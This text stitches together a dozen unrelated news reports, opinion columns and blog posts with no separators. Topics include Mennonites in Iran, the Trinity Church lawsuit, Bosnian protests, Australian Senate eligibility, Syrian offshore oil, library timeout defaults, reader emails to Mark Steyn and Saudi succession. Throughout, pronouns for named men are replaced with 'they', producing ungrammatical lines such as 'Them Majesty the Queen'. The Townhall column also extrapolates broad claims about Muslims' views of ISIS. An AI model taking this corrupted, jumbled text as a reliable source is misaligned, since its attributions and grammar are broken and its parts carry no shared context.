Members of their delegation attended a conference on philosophical thought held in honor of Ayatollah Morteza Motahhari, a key figure in the Iranian revolution who was assassinated in 1979. Among those speaking at the conference was Ali Larijani, a son-in-law of Motahhari who is the speaker of the Iranian parliament and a former chief nuclear negotiator. According to Martin, Larijani — who wrote their doctoral dissertation on the works of the German philosopher Immanuel Kant — confined their comments to philosophy, not politics. However, the Mennonites also met with Kazem Sajjadpour, a former Iranian diplomat and adviser to Foreign Minister Mohammad Javad Zarif. Martin said they planned to brief US State Department officials and members of Congress on their trip.
Even though senior US officials are now speaking or otherwise interacting with Iranian officials on a daily basis to try to resolve the nuclear dispute, people-to-people dialogue is crucial to increase knowledge of Iran by Americans and lay the basis for a wider rapprochement, the US visitors to Iran said.
“Pope Francis calls dialogue the royal road to peace," Colecchi told Al-Monitor.
Destro said, “If you're going to try and open up lines of communication that are more than threats, you have to start somewhere.”
“The Trinity Church properties are now among the most valuable in all of New York City, because they are sitting on the edge of the hottest neighborhoods in the city — SoHo, TriBeCa and Greenwich Village,” said Mitchell L. Moss, a professor of urban policy and planning at New York University. “Trinity has been either very wise or very prudent, but they have let the market mature around them, and now they are ready to take advantage of it.”
The church, which calls itself “one of the largest landowners in Manhattan,” has also been building an equity investment portfolio that was worth about $160 million in 2011. And the value of Trinity's real estate holdings is expected to grow because rezoning of much of the church's land will allow up to 3,200 new residential units, with the first large project planned for Duarte Square on Canal Street.
“The legacy of Queen Anne is that Trinity Church is going to prosper in the 21st century,” Mr. Moss said. “Who says that the empire doesn't live on?”
Mr. Bates, who says they want the church to be more accountable to its members, argues in their lawsuit that the parish vestry, which acts largely as Trinity's board of directors, is being elected contrary to the terms of the church's original 1697 charter.
Mr. Bates claims that each vestry candidate must receive a majority of parishioners' votes to be elected. The church says that even one “yes” vote is enough if the candidate is uncontested; all the seats are uncontested. The parish has asked for the suit, filed in State Supreme Court in Manhattan, to be dismissed. The dispute over spending and governance is, in part, a dispute over the leadership of the Rev. James H. Cooper, who has been the church's rector since 2004.
“You have diminished Trinity Church, and you have created a glaring atmosphere of deceit,” wrote one longtime vestry member, Lorraine LaHuta, in their 2012 resignation letter.
Whatever little semblance of legitimacy the constitutional order in Bosnia-Herzegovina (BiH) may have enjoyed at the beginning of this week went up in flames on Friday night. BiH's three Presidents, two entities, one special district, ten cantons and internationally appointed High Representative - the entirety of its bloated bureaucracy - witnessed the storming of their government offices in the cities of Tuzla, Sarajevo, Zenica, Bihac and Mostar.
As a result, at least two regional governments have collapsed, in the Tuzla and Zenica-Doboj cantons. What began as a local, anti-privatisation protest on Wednesday in Tuzla had grown by Friday into a general social insurrection.
Two years ago, I wrote that a "Bosnian Spring" was this country's only hope for a brighter future. Now, the spring has come, and with it, the storms.
For nearly twenty years, Bosnians and Herzegovinians have suffered under the administration of a vicious cabal of political oligarchs who have used ethno-nationalist rhetoric to obscure the plunder of BiH's public coffers. The official unemployment rate has remained frozen for years at around 40 percent, while the number is above 57 percent among youth. Shady privatisation schemes have dismantled what were once flourishing industries in Tuzla and Zenica, sold them off for parts, and left thousands of workers destitute, with many still owed thousands of dollars in back-pay. Pensions are miserly too; the sight of seniors digging through waste bins[Ba] is a regular one in every part of the country, while the wages of BiH's armies of bureaucrats and elected officials have only grown[Sr].
Pervasive corruption
After the general elections in 2010, it took sixteen months for a state government to be formed, one which collapsed almost immediately thereafter. Since then, on the rare occasion that Parliamentary sessions have actually been held, the members of this body have mostly concerned themselves with calling for the ouster of their political opponents. ZivkoBudimir, for instance, the president of the Federation entity, was arrested in April of last year on suspicions of corruption and bribery. They were released shortly thereafter for "lack of evidence" and has since returned to their post. As Sarajevo burnt on Friday, Budimir declared[Sr/Ba/Hr] that they would resign if the people insisted - apparently refusing to look out their window as they spoke.
Several major elected official in BiH have been under investigation for corruption. In the Federation, the squabbling of Bosniak and Croat nationalists has immobilised government institutions. In the Republika Srpska(RS) entity, President Milorad Dodik has attempted to make themselves synonymous with the Serb nation itself - hounding the few independent journalists and activists who dared challenge him.
But the ethno-nationalist rhetoric of these elites betrays the realities of BiH's true political economy: accumulation through dispossession. The graffiti on the walls of the burnt out husk of the Tuzla canton government now offers a stark rebuke to these policies: "You must all resign! Death to nationalism!"
The international community has, meanwhile, allowed this sordid state of affairs to fester since the signing of the Dayton Peace Accords in 1995. An initial period of reform between 1996 and 2006 has all but completely ceased and since then the country has jerked from one constitutional crisis to the next. All the while, seething public anger has repeatedly threatened to boil over, as it did this past summer during the so-called "Baby Revolution".
The reasons for this rage are simple: At no point have the international architects of peace in BiH expended any serious energy to include ordinary citizens, students, workers or pensioners in the reforms which European and American diplomats insist the country requires. Instead, by engaging exclusively with members of BiH's obstructionist and recalcitrant political establishment, they have only cemented the oligarchs in their posts while the pleas and demands of ordinary citizens, students, workers and civil rights activists have been ignored.
A transformed society
Now, the entire structure of the Dayton system, precisely because of the arrogant and ignorant practices of its local and international representatives, has all but collapsed in a single night. Attempts to shore up this system will be made, of course, but the psychological transformation we have witnessed in the people of BiH is now irreversible.
A substantive parliamentary democracy fundamentally requires the autonomy of the citizenry and the expectation on the part of the ruling establishment that, unless they fulfil the needs and demands of their electors, they will be toppled - at the polls or in the streets. For twenty years this expectation has been absent in BiH. And for twenty years the ruling establishment has plundered freely. They have wrought so much misery that the speed with which the entire structure appeared to collapse on Friday left many citizens in utter disbelief.
In this mayhem, no small degree of confusion and fear will prevail. Many have already expressed anger towards the militants who torched the government buildings, claiming that the costs of the repairs will once again come out of the pockets of ordinary citizens. Such analysis, however, ignores the far more massive debts already incurred by all levels of government in BiH.
The Public Interest Advocacy Centre (PAIC), noted that the public sector debt with commercial banks doubled in the past four years and that: "A big part of corrupted activities stem from relations of government officials and commercial banks." The PAIC report suggested that the billions that have been borrowed have mostly ended up lining the pockets of individual politicians,they are, nonetheless, being paid back through the further gutting of BiH's few remaining social services. This popular uprising, however, has the potential to reverse this course.
There is also news of damage to part of the National Archives, rightfully eliciting anger in some quarters. Yet the National Museum of BiH has sat closed since October of 2012 and the country's other main cultural institutions are also struggling, to the dismay of a global network of activists and artists. Despite the existence of four separate levels of government, not one of them considers the preservation and financing of BiH's cultural monuments a priority. An institution that has survived three wars and has been operated continuously for a hundred and twenty four years is on the brink of collapse, not because of these protests, but because of these governments.
In the next few days, BiH will find itself a society transformed. Genuine change will require that those who have previously been excluded from power now have an opportunity to reshape their communities. The key organisers in Tuzla - more effective and popular than the current leaders, if this week's events are any indication - already form the basis for an interim government[Ba], one composed of the representatives of students and workers. Elsewhere, the situation is still evolving, but all foreseeable solutions include the same first step: The existing authorities must step down.
More broadly, there seems to be widespread support for the abolition or, at least, the reorganisation of the cantons: in short, a rationalisation of the state apparatus. The protestors realise that the country's dire economic situation is not merely the result of corrupt officials, but rather of the constitutional order itself. The changes they demand likewise address the system directly.
The fury on display in the streets of BiH over the past few days was an ugly sight. But what is still more hideous has been the past twenty years of corruption, thieving and manipulating on the part of the entirety of the BiH political establishment. Already, they have attempted to deny any personal responsibility and to offer duplicitous temporary solutions. It is much too late for them.
For the people of BiH, however, this is merely the beginning. Tumultuous days are no doubt ahead, but as long as the citizens of this little land do not forget the fear they inspired in their rulers tonight and continue to press their demands, together, they may yet usher in a truly democratic Spring.
Jasmin Mujanovic is a PhD candidate at York University and currently a Visiting Scholar at the Harriman Institute at Columbia University. Originally from Sarajevo, they are a regular Balkan affairs analyst. Their Twitter handle is @JasminMuj.
Get the biggest politics stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe, try again later Invalid Email
President Trump is heading to the UK for a state visit this year after an invitation from Queen.
Prime Minister Theresa May made the announcement during a joint press conference with the two leaders in America this afternoon.
They will no doubt be joined by the First Lady Melania Trump during the visit.
(Image: AFP)
During the briefing both praised the so-called 'special relationship' that exists between the US and Britain.
Mrs May said: "Thank you for inviting me so soon after your inauguration and I'm delighted to be able to congratulate you on what was a stunning election victory.
(Image: REUTERS)
"And, as you say, the invitation is an indication of the strength and importance of the special relationship that exists between our two countries, a relationship based on the bonds of history, of family, kinship and common interests.
"And in a further sign of the importance of that relationship I have today been able to convey Them Majesty the Queen's hope that President Trump and the First Lady would pay a state visit to the United Kingdom later this year and I'm delighted that the president has accepted that invitation."
(Image: Getty)
Perhaps unsurprisingly, Brits started proposing protests to the visit within minutes of the announcement.
Judy Smith, who is the sister of One Nation leader Pauline Hanson. Credit:Robert Rough Fairfax Media understands the Turnbull government is now considering Senator Roberts' eligibility and is weighing up a High Court referral. If the High Court examines their eligibility and finds they were invalidly elected because they were a dual national, the Senate seat would fall to Mr Anning, a Queensland business person who ran in the third position on One Nation's Queensland ticket. However, Mr Anning is the subject of a bankruptcy application lodged in the Federal Court on July 19. The constitution prevents people who are found to be bankrupt from serving in Parliament. Fairfax Media alleges no wrongdoing by Mr Anning and the application to make them a bankrupt may not proceed. But if the bankruptcy application is successful, the seat would most likely fall to Judy Smith, one of Senator Hanson's six siblings, who ran on the largely unwinnable fourth position on the ticket.
Pauline Hanson announces their 2004 Senate run alongside sister Judy Smith. Credit:Andy Zakeli Ms Smith describes themselves as "extremely proud of their sister" and has "always been by Pauline's side, giving their full support". "Judy shares the same values as Pauline and would like to help strengthen their cause in the Senate, by their side," the One Nation website notes. The Federal Court website listing the application. Fairfax Media has attempted to contact Mr Anning for comment.
According to the One Nation website, Mr Anning has a lengthy business history. Fraser Anning, who was third on One Nation's Queensland Senate ticket. Credit:One Nation "Fraser has always closely followed politics in this country and believes now is the time for a change stating, 'we need to get Australia back on track with real people in government instead of the privileged fools we have in power now'," the page says. Their biography notes they are married to "Fiona". The bankruptcy application was lodged by ABL Nominees Pty Ltd. Mr William Fraser Anning and Mrs Fiona Ruth Anning are listed as a respondent.
The matter will first be heard in court on August 22. The application relates to Great Southern Ltd, a managed investment scheme that collapsed in 2009. Thousands of investors faced financial ruin after the collapse of the scheme, which had invested in agricultural business including timber plantations and cattle properties. Mr Anning is being pursued by the Bendigo and Adelaide Bank. In 2016 a Senate inquiry recommended that the bank should give special consideration to borrowers who took out loans to invest in the failed agribusiness scheme. "Even though banks were not directly involved in arranging the loans ... they absolutely owed a duty of care to borrowers," the Senate report said. ​After more than a week of intense pressure to explain their citizenship status, Senator Roberts conducted a television interview late on Thursday in which they attempted to map out the timeline of their renunciation.
They revealed they did not receive confirmation from British authorities that their renunciation had been successful until December 5 - a full six months after they nominated as a candidate and five months after the election.
Anne Twomey from the University of Sydney said Senator Roberts must clear up two pressing questions - when their renunciation took effect and exactly what steps they took before nominating to renounce. "It would be significant if that renunciation took effect after the nomination date. The legal status of renunciation is a matter of UK law - not a matter of what Senator Roberts 'chooses to believe'," Professor Twomey said. "The second question is whether they had taken 'all reasonable steps' to renounce their foreign citizenship before the nomination date. If there was a formal procedure to do so and they did not comply with that procedure before the nomination date, then it is arguable that they did not take all reasonable steps." University of New South Wales expert George Williams agrees the key question is exactly what Senator Roberts did prior to nomination. "Did they merely email, or did they take all steps to fill in the relevant UK forms in good time for their citizenship to be renounced prior to their nomination?
"If you took every reasonable step, including complying with all of the UK processes, but they unreasonably delayed, then they may survive. If, on the other hand, they merely emailed, or left things too late, then they are likely to be disqualified." Professor Williams said: "There is enough here to cast real doubt over their eligibility to remain in the Senate. Their case, along with the others, should be referred to the High Court." Fairfax Media put some of these questions to Senator Roberts' office but they have refused to answer. Senator Roberts' senior media adviser, Sean Black, threatened to report journalists to police. "Your persistent emails, despite requests to stop, is classified by our office as stalking," Mr Black said in an email.
"Any continued pestering or harassment from you or your colleagues of anyone, including me, from our office or organisation will be referred to the Queensland police. Loading "This issue is now over. Stop the harassment. Please find another victim." Follow us on Facebook
William Engdahl is an award-winning geopolitical analyst and strategic risk consultant whose internationally best-selling books have been translated into thirteen foreign languages. They have lectured as Visiting Professor at Beijing University of Chemical Technology and delivers talks and private seminars around the world on subjects of current importance from economics to oil geopolitics to agribusiness. A widely discussed analyst of current political and economic developments, their provocative articles and analyses have appeared in numerous newspapers and magazines and well-known international websites.  They are a Research Associate of the Centre for Research on Globalization in Montreal and member of the editorial board of Eurasia magazine. Based in Frankfurt, Germany they may be reached via their website www.williamengdahl.com
The wars for control of Syria, and actually there is more than one going on simultaneously, have a strong background in an undeclared war over who will control the region's gigantic and newly-discovered oil and gas reserves.
Now, Russia has just secured a major contract with the Syrian government. This comes after they brilliantly handed President Obama a face-saving way out of unwanted direct military action in Syria by brokering a deal with Syrian President Bashar Assad to remove the country's stock of chemical weapons. Regardless of whether Assad remains president, Russia holds exploration and development rights to a major part of Syria's offshore waters.
On December 25, Syrian Oil Minister Suleiman Abbas on behalf of the Syrian government signed a 25-year deal with the Russian SoyuzNefteGaz company to explore for oil in the Middle Eastern country's territorial waters off the Mediterranean coast. SoyuzNefteGaz is headed by Russia's former energy minister, Yuri Shafranik, and its main shareholder is the Central Bank of Russia. It was founded in 2000 "to enhance economic cooperation with former Soviet countries, the Middle East and North Africa," according to RIA Novosti, the state Russian news agency. It also has projects in Iraq and Uzbekistan.
The Syrian deal is part of Putin's long-term strategy in the region, in other words.
The new agreement covers an 845-square-mile [2,188 square kilometers] area stretching southward from the government-controlled city of Tartus, where Russia also has its only Naval base in the Mediterranean. The rights extend to Banias, and about 45 miles into the Mediterranean in the Syrian Exclusive Economic Zone. The Russian company has been involved for a number of years in onshore oil projects in Syria.
Mediterranean energy scramble
With the move to develop Syria's offshore energy potential, Russia is stepping into a hot and rapidly developing scramble for what are estimated to be oil and gas reserves comparable to one or more new Saudi Arabia-size regions.A look at the offshore map of the region would be revealing.
Since it discovered significant gas in its offshore waters in 2010, Israel has become a major player in the development of oil and gas in the Eastern Mediterranean, including in Cyprus which has confirmed significant gas fields of its own. Lebanon's offshore exploration has been disrupted (perhaps conveniently for some rivals) by the war in Syria, as has Syria's own oil and gas exploration.
In 2009, the Emir of Qatar went to Damascus to negotiate an agreement with President Bashar Assad for a Qatari gas pipeline from their huge offshore gas field, North Dome, which is contiguous with the Iranian South Pars field in the waters of the Persian Gulf dividing the two countries. The South Pars/North Dome field is the world's largest gas field, shared between Iran and Qatar. Qatar, already the world's largest liquified natural gas (LNG) producer, mainly for the Asian market, badly wants to get direct access to the booming EU gas market. Qatar's proposition to Assad was to build a gas pipeline that would bring Qatari gas through Syria and into Turkey, a close Qatari ally. Assad refused, citing Syria's strong energy relations with Russia.
In March 2011, Assad signed another gas pipeline deal: this time with arch-Qatar enemy, Iran. Qatar is fundamentalist Sunni and home to the radical Muslim Brotherhood. Iran is fundamentalist Shiite Muslim and Iraq is ruled by a Shiite Prime Minister. Both Iran and Iraq back Assad in the current war for control of Syria. The Iranian gas pipeline would extend from its Persian Gulf field through Iraq and through Syria. No sooner was the ink dry on the Iran-Iraq-Syria gas pipeline when a full-scale terror war, financed by Qatar to the tune of billions of dollars, exploded across Syria.
Now Russia has stepped in, after the failure of Qatar, the Saudis and Turkey to topple the Assad regime and replace it, either with a fundamentalist Wahabite Saudi regime or a fundamentalist Salafist Muslim Brotherhood, one that would do business with them and not with Russia.
The statements, views and opinions expressed in this column are solely those of the author and do not necessarily represent those of RT.
Warriors pay $4 million for championship parade
Team owners Joe Lacob, left, and Peter Guber, right, speak during the Golden State Warriors NBA championship rally Thursday, June 15, 2017, in Oakland, Calif. Oakland is celebrating its second championship in the past three years. (AP Photo/Eric Risberg) less Team owners Joe Lacob, left, and Peter Guber, right, speak during the Golden State Warriors NBA championship rally Thursday, June 15, 2017, in Oakland, Calif. Oakland is celebrating its second championship in ... more Photo: Eric Risberg, Associated Press Photo: Eric Risberg, Associated Press Image 1 of / 99 Caption Close Warriors pay $4 million for championship parade 1 / 99 Back to Gallery
The Warriors' championship parade cost team owners Joe Lacob and Peter Guber roughly $4 million, a team source told The Chronicle on Friday afternoon.
Typically, a team's city will help cover the costs of the championship parade. But after discussing the matter with City of Oakland officials, who are facing a massive budget shortfall, Lacob and Guber volunteered to cover the entirety of parade production costs.
It remains uncertain exactly what percentage of the bill Golden State footed for its championship parade in 2015. The Warriors, who have begun construction on the privately-financed Chase Center, plan to move to San Francisco in time for the 2019-20 season.
Connor Letourneau is a San Francisco Chronicle staff writer. Email: cletourneau@sfchronicle.com. Twitter: @Con_Chron
Many libraries wrap some external communication. Be it a REST-like API, a message queue, a database, a mail server or something else. And therefore you have to have some timeout – for connecting, for reading, writing or idling. And sadly, many libraries have their default timeouts set to “0” or “-1” which means “infinity”.
And that is a very useless and even harmful default. There isn't a practical use case where you'd want to hang on forever waiting for a resource. And there are tons of situations where this can happen, e.g. the other end gets stuck. In the past 3 months I had 2 libraries that have a default timeout of “infinity” and that eventually lead to production problems because we've forgotten to configure them properly. Sometimes you even don't see the problem, until a thread pool gets exhausted.
So, I have a request to API/library designers (as I've done before – against property maps and encoding other than UTF-8). Never have “infinity” as a default timeout. Your library will thus cause lots of production issues.
Also note that it's sometimes an underlying HTTP client (or Socket) that doesn't have a reasonable default – it's still your job to fix that when wrapping it.
What default should you provide? Reasonable. 5 seconds maybe? You may (rightly) say you don't want to impose an arbitrary timeout on your users. In that case I have a better proposal:
Explicitly require a timeout for building your “client” (because these libraries are most often clients for some external system). E.g. Client.create(url, credentials, timeout) . And fail if no timeout is provided. That makes the users of the client actively consider what is a good timeout for their usecase – without imposing anything, and most importantly – without risking stuck connections in production. Additionally, you can still present them with a “default” option, but still making them explicitly choose it. For example:
Client client = ClientBuilder.create(url) .withCredentials(credentials) .withTimeouts(Timeouts.connect(1000).read(1000)) .build(); // OR Client client = ClientBuilder.create(url) .withCredentials(credentials) .withDefaultTimeouts() .build();
The builder above should require “timeouts” to be set, and should fail if neither of the two methods was invoked. Even if you don't provide these options, at least have a good way of specifying timeouts – some libraries require reflection to set the timeout of their underlying client.
I believe this is one of those issues that look tiny, but caus a lot of problems in the real world. And it can (and should) be solved by the library/client designers.
But since it isn't always the case, we must make sure that timeouts are configured every time we use a 3rd party library.
Having been fired and had their contract torn up by CRTV, Mark is back out in the world. Today, Friday, they checked in with Neil Cavuto on Fox News to talk immigration and terrorism:
Later on Friday, Mark talked other immigration issues with Liz MacDonald on Fox Business. You can see the interview here.
~Thank you so much for all your supportive emails after CRTV's cancellation of The Mark Steyn Show. We are very touched by them, and also by the many comments over at our Facebook page. Mark is extremely grateful, at what is a very difficult time in their professional life, for so many loyal readers and viewers. Some CRTV customers have also been forwarding us their responses to the company's demand that they explain why they wish to cancel their subscriptions. This one is from Steve Morrisey to CRTV's Customer Service:
To whom it may concern... Mark Steyn is a hilarious and highly entertaining individual. When I heard that Mark was going to be a participant in the CRTV lineup, I immediately subscribed and waited patiently until their show came online. With all the alternative media available, Mark's show was unique and captivating. It was like a political variety show that I have never seen the likes of before. Mark had in depth interviews that I was hoping that you would archive. I would have liked to have had the ability to have revisited them in the future. But, now there is nothing that even references Mark Steyn or their previous shows on your website. I don't know what had happened to cause the split (I hope their bandaged thumb is unrelated to the departure.) but I would like to see you make amends. I had put a visit to Ice Station E.I.B. on my bucket list and had anticipated that one day I'd be part of the live CRTV audience. With regret, I am unsubscribing. I have to say that your Customer Service person did make the cancellation and refund painless and accommodating. It was nothing like trying to cancel a vitamin subscription with Purity Products. Sincerely, Steve Morrissey
We have also had many queries such as this one:
I would like to send you the refund I got from CRTV. How can I do that? Michael Schwenk
That's very generous of you, Michael. Your fellow former CRTV subscriber Douglas Gester used their CRTV refund to treat themselves to a SteynOnline gift certificate. They start at $25 and are a great gift for a friend who's wondering where The Mark Steyn Show went - and, like any other purchases from the Steyn Store, they certainly help defray some unexpected expenses we've had: When CRTV fired Mark and broke their contract, they left them with the payroll and production costs for all February's shows, including episodes filmed in Phoenix and Ottawa - and even the tab for the cleaners at the studio they locked them out of. Mark has paid all these because they don't feel others should suffer as a result of their poor judgment in getting mixed up with CRTV.
But nor do they want disgruntled CRTV customers feeling obliged to prop up SteynOnline. As demoralized as Mark is by the end of a project they loved working on, they feel more ashamed at having helped get so many longtime fans suckered into believing CRTV's false promises of a year's worth of shows.
Anyway, here is today's selection of reader emails:
I was constantly checking CRTV for new episodes, as I have loved you since I first heard your voice about 10 years ago, and I felt a disturbance in the universe when I noticed that your show disappeared from my app.
I loved the quality of your interviews and always felt that I learned something from watching. I fear that now I will only be subjected to ranting that I eventually turn off. SO SAD!
I hope you can get back on some digital medium soon, I would definitely pay to be able to see you regularly.
Fight on!
Stephanie Roper
**
Dear Mark,
I'm sorry to hear your association with CRTV has ended. You were one of the main reasons I signed up for it and although there were problems getting your studio up and running the shows you produced were enjoyable and informative. There's an opportunity being lost here, the subject of which was discussed when you interviewed Andrew Klavan. I think Klavan mentioned a saying of Andrew Breitbart, that politics is downstream of culture. You and Klavan are two of the small number of prominent conservative commentators who seem to understand how beneficial the impact of Art can be on opinion.
That's not to say mainstream conservatives are unaware of social impacts of media and the education system — they rail about it all the time. It's just they tend to fight them head on politically instead of thinking about how to use art and culture to effect opinion upstream of politics. An example of how liberals do this, subtly, is through NPR programs like "Wait, Wait, Don't Tell Me", and especially, "Prairie Home Companion". PHC is a program families listen to together that is mostly wholesome and appealing. Many who consider themselves part of intelligentsia listen to it as if it offers great wisdom. And yet, most of the system of beliefs implied through comments by Keillor are very liberal and are taken up almost without question by many of those listening.
And what do conservatives have in this form of broadcast? Well, we used to have The Mark Steyn Show. Crowder, while funny and insightful, is NOT a family show. Levin's show uses mostly a fact-based approach as do the shows of most other conservatives. It's all left-brain all the time. Art is good at representing ourselves (humans) from a right-brain direction. Look at the art of the Renaissance. That period not only presented a leap forward in technique, but most importantly, gave us a sense of ourselves as humans and spiritual beings... The miracle of life.
Catch-22, a masterpiece if there ever was one, has a great example of how culture effects our subconscious. There's a scene in which Yossarian belittles God to Lt. Scheisskopf's wife, infuriating them When Yossarian says, But you don't believe in God, Scheisskopf's wife replies, but the God I don't believe in is a good God, a just God, a merciful God. He's not the mean and stupid God you make Him out to be. Back then culture expected respect for God and religion, respect for life, respect for others. The politics of whether God existed was downstream of the understanding that They were good... Just last week I revisited The Hidden Fortress, the great film of Kurosawa. It's on a par with Casablanca with respect to heroism and bravery. It was like a booster shot to remind me of how noble man can be.
Mark, I'm so very sorry for what has happened at CRTV. You introduced me to Andrew Klavan and due to that, over the past few weeks, I've decided to start praying again. I will pray for you.
Best wishes,
John Wu
Menlo Park, California
**
Dear Mark -
So disappointed at the CRTV poor decision. Please set up an independent show of your own - with my subscription I could watch you everywhere! - Paris, Glasgow, on the Queen Elizabeth, through the Panama Canal all the way to Palm Springs and even in Williams Lake, BC.
I don't mind forfeiting my subscription to CRTV if it leads to you having your own platform - hell, we have cancelled the cable so we are awash in money to throw at you!!
Your number one fan,
Maggie Menzies
**
Now THAT is annoying Mark! Crowder and Levin and Malkin are fine and all ... BUT YOU ARE THE ONLY REASON WE SHELLED OUT THE BUCKS FOR CRTV!!!!!
Your servant by Their grace,
Bill Tomlinson
**
I signed up for CRTV for Steyn. I have listened to Levin for a decade. I tweeted at them twice wondering why during their crtv hourly promos they never once mentioned Steyn. The "Malkin Crowder and others" line annoyed me daily and caused redflags to go up.
Clearly I was right and as much as I want to support the others who I have always liked I am cancelling.
Kyle Yount
**
Consolations Mark, My wife and I thoroughly enjoyed your shows. It was the main reason we subscribed to CRTV.
We had intended to buy a TV so that we could watch your program on a larger screen, but cancelled that purchase since we can't enjoy your in-depth interviews and insightful comment.
So your cancellation has a trickle down economic impact since we won't buy a TV, renew our CRTV subscription, won't purchase books you review or music we hear from artists we saw on your show.
We loved the interviews, the commentary, the musicians and the songs. Your depth of culture was a refreshing enjoyment. We hope for you that this is an opportunity and not an obstacle.
Larry and Trudy
**
Mark -
I was shocked to learn that you have been dropped from CRTV.
To say that your show was both entertaining and informative is the understatement of the year !!! I hope you can somehow continue on with a similar show within another delivery system.
Best wishes,
Richard Goldfarb
**
Mark,
Like so many others, I am extremely disappointed that CRTV has cancelled your delightful show. Your show was the only reason I subscribed.
If you find a way to continue it I.e. monetize it, I'll be there, credit card in hand.
All the best,
Richard Oatway
**
I'm very saddened to hear about CRTV's decision. Your shows were delightful, insightful, and sophisticated. It was so appreciated compared to the drivel out there. Your musical background was especially admired.
The price for crtv was worth it BECAUSE of your show which I greatly anticipated each episode. Not sure it is worth it now. God bless you, Sir!
Pat Daniel
**
Mark,
I cancelled with CRTV of course. To their credit, they issued a prompt refund when called. It sounded like they had quite a few callers like me today.
I told them I appreciated the way they handled the refund, and I would re-subscribe when they get you back.
Keep up the good work. — Another Mark
Mark E. Shere
Indianapolis, Indiana
Pew Data, Islamic Expert: More Than 60 Million Muslims Hold Favorable Views of ISIS
Guy Benson | Townhall
Posted: Jun 15, 2016 12:36 PM
In the wake of yet another bloody massacre perpetrated by Islamist terrorists, media and political elites are, like clockwork, tripping over one another to remind us that Islam as a whole should not be held responsible for the carnage.
And of course that's true. Even raging Islamophobes understand that not every Muslim in the world is murderous or malicious, and most reasonable people happily acknowledge that the vast majority of the planet's 1.6 billion Muslims are peaceable people who adhere to relatively moderate interpretations of Islam. Virtually nobody disputes any of that.
But the fiction that Islamist violence has nothing whatsoever to do with Islam is both intellectually insulting and dangerously naive.
We've written previously about the alarming number of Muslims worldwide who at best hold profoundly illiberal views on issues such as free speech, human rights, and the imposition of Sharia Law.
A recent survey of British Muslims only underscores why serious concerns about Islam in the West shouldn't merely be waved away as ignorance and xenophobia. Are those who decry the “ignorance” aware of data like this?
Do they have any idea what Sharia Law entails? Have they read this report, curated and authored by a human rights advocate who renounces many of their own landmark findings on “Islamophobia” from less than a decade ago?
Back Stateside, The Federalist has published a commentary by an Islamic scholar who analyzes the deadly Orlando rampage through the prism of their religion's teachings on homosexuality. Some of their conclusions:
There is a pattern in the way ISIS and its supporters execute those it alleges are homosexual: ISIS usually, although not always, has them thrown off of tall buildings. As inhumane as these executions may be, murdering homosexuals in this way does not come from a nihilistic urge for carnage. No, these are cold and calculated steps taken by murderers who believe they serve God through such acts…There is relatively good evidence that Islam prohibits homosexual acts. This can be gleaned from reading the Qur'an (Q 15:73; 7:80-82; 26:165-175; 27:55-58; 29:28-29), which talks about the punishment that God visited upon the “people of Lot,” which the Qur'an takes to be a lecherous people who participated in homosexual acts…Second, there is a hadith in “Sahih Al-Bukhari,” the most trusted collection of Sunni ahadeeth, where Muhammad curses “effeminate men.” This hadith does not go so far as to recommend that homosexuals be killed, but it does provide fodder for Islamists who want to persecute homosexuals…
Third, a prominent hadith (saying) attributed to Muhammad mandates the death penalty for partakers of homosexual acts. However, to my knowledge only one such hadith is considered reliable by Muslim scholars, and it is not found in the two Sahih collections (“Sahih Muslim” and “Sahih Al-Bukhari”), the two most trusted collections of ahadeeth…while there is a consensus amongst Muslim scholars that homosexual acts are sinful, there is no consensus about the proper punishment of such acts. Some Muslim scholars, including early ones, reject the above hadith on killing homosexuals as having a weak isnad, or chain of transmission, and therefore judge it to be unreliable.
ISIS, they say, naturally gravitates toward the most primitive and brutal Koranic analyses. They also rebuff the dangerous feel-goodery that Islamist terrorism is somehow entirely divorced from Islam, the religion from which radicals draw their inspiration and justification.
“Fair-minded commentators, therefore, do not dismiss such murderous actions as nihilistic crimes against humanity. Rather, they understand the murderers are motivated not by a nihilistic urge for violence, but by cold and calculated reasoning that runs deep in the Islamic source texts and traditions.
These source texts and traditions provide the fertile breeding ground for people like Mateen,” they write And then there's this:
Although supporters of extremist Islamist groups make up a relatively small percentage of the total Muslim population, this leads to underestimating the scope of the Islamist problem. In absolute numbers, more than 60 million Muslims the world over, a population roughly equal to that of the United Kingdom, holds a favorable view towards ISIS. Millions more are unsure about whether they hold a favorable or unfavorable view towards ISIS, according to Pew research.
Here is the 2015 Pew data he's referencing:
Extrapolating these results across the combined Muslim populations within the countries polled (which excludes significant numbers of Muslims living elsewhere in the world, including in the West) leads to an estimate of more than 60 million people holding positive views of the evil terror army.
That figure does not include the many millions of additional respondents who expressed ambivalence on the question, answering that they “don't know” how they feel about vicious hoards who crucify children, burn people in cages, and rape little girls to death.
Even if you question Pew's methodology and insist that their numbers overstate the problem by half, that still leaves tens of millions of Muslims who hold favorable attitudes toward ISIS, the embodiment of Islam's most virulent and ruthless strain.
It's healthy and accurate to affirm that mainstream Islam does not condone acts of terrorism against innocents.
It's also essential to view the real threat, and understand its disturbing scope, with clear eyes.
I'll leave you with this Daily Signal project tallying the dozens of successful and thwarted (publicly-known) Islamist terror plots on US soil since 9/11:
FILE PHOTO - Saudi Arabia's Deputy Crown Prince Mohammed bin Salman reacts upon their arrival at the Elysee Palace in Paris, France, June 24, 2015. REUTERS/Charles Platiau/File Photo
(Reuters) - A senior Saudi official on Wednesday denied that there was anything wrong with the way that crown prince Mohammed bin Nayef was removed from their post in favor of the king's favorite son, Mohammed bin Salman.
Reuters reported earlier on Wednesday that the heir to the throne, Mohammed bin Nayef, had been forced to step aside in an effective palace coup by King Salman bin Abdulaziz because the younger man's judgment was clouded by their addiction to painkilling drugs.
The high official source said the account was totally “unfounded and untrue in addition to being nonsense”.
“The story depicted here is a complete fantasy worthy of Hollywood,” the official said in a statement to Reuters.
The statement did not refer to Mohammed bin Nayef's alleged use of drugs such as morphine, which they took to cope with pain they suffered after an attacker blew themselves up in front of them in their palace in 2009.
The Saudi official said Mohammed bin Nayef had been removed from their post in the national interest and had not experienced any “pressure or disrespect”.
The official added that the reasons for Mohammed bin Nayef's removal were “confidential”.
Sources with knowledge of the situation reported that Mohammed bin Nayef was under house arrest following their removal from office, but the Saudi official said Mohammed bin Nayef had received guests, including the king and the new crown prince.
Despite suggestions by sources that King Salman might step down in favor of Mohammed bin Salman, the Saudi official said the king was “in excellent health”.
Toni Rüttimann, (Pontresina, 21 August 1967) is a Swiss bridge builder who works in Southeast Asia and in Latin America, where they are known as Toni el Suizo (Toni the Swiss).[1]
Bridgebuilder Toni Rüttimann – Toni el Suizo
